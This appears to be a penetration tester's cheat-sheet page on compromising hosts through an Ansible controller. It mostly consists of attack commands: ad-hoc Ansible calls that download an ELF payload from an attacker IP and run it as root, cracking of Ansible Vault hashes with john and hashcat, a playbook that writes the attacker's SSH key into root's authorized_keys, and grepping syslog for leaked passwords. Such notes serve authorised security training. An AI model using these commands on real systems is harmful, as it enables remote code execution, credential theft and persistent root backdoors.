Ansible

The Ansible server needs elevated privileges to perform certain tasks on the end node, the user configured by Ansible typically has root or sudo-level permissions. Because of this, compromising the Ansible server or getting the private key for an Ansible configuration account could allow complete compromise of any nodes in the Ansible controller’s inventory:

/etc/ansible/hosts

Enum

ansible
cat /etc/ansible
cat /etc/passwd
cat /var/log/syslog

Executing commands

ansible appserver05.dev.final.com -a "wget http://192.168.45.174/666.elf" --become
ansible appserver05.dev.final.com -a "chmod +x 666.elf" --become
ansible appserver05.dev.final.com -a "./666.elf" --become

--become (defaults to root)

If we can gain privileges to run ad-hoc commands from the Ansible controller, we have backdoor root access to run commands on any of the hosts in the inventory file (under most common configurations).

Playbooks

/opt/playbooks/

Playbooks might contain hardcoded creds or Ansible Vault hashes

ansible-playbook getinfo.yml

If Ansible is set up to use SSH for authentication to nodes, we could steal the Ansible administrator user’s private key from their home folder and log in to the nodes directly. All of these are options if we’re already root on the controller.

Ansible Vault

Can be cracked

/usr/share/john/ansible2john.py
hashcat testhash.txt --force --hash-type=16900 /usr/share/wordlists/rockyou.txt

cat pw.txt | ansible-vault decrypt

(where pw.txt contains entire encrypted vault, you will be prompted for your cracked pass)

Playbook permissions

---
- name: Get system info
hosts: all
gather_facts: true
become: yes
tasks:
- name: Display info
debug:
msg: "The hostname is {{ ansible_hostname }} and the OS is {{
ansible_distribution }}"
- name: Create a directory if it does not exist
file:
path: /root/.ssh
state: directory
mode: '0700'
owner: root
group: root
- name: Create authorized keys if it does not exist
file:
path: /root/.ssh/authorized_keys
state: touch
mode: '0600'
owner: root
group: root
- name: Update keys
lineinfile:
path: /root/.ssh/authorized_keys
line: "ssh-rsa AAAAB3NzaC1...Z86SOm..."
insertbefore: EOF

become: yes == run as root

The first task we inserted creates the /root/.ssh folder and sets the appropriate permissions on it. The second task creates the authorized_keys file and sets its permissions. The last task copies our public key into the root user’s authorized_keys file, appending it to the end if the file already exists. In this case, we’ve used the public key from our Kali VM. If the playbook is run by the ansibleadm user, our key is added to the root user’s account on the linuxvictim host. Once it is added, we are able to SSH to the linuxvictim machine from our Kali VM as root.

Simple shell command:

- name: Run command
shell: touch /tmp/mycreatedfile.txt
async: 10
poll: 0

Syslog

Make sure to check syslog for modules leaking info through parameters (like mysql passwords being passed).

cat /var/log/syslog | grep password

Last updated 2 years ago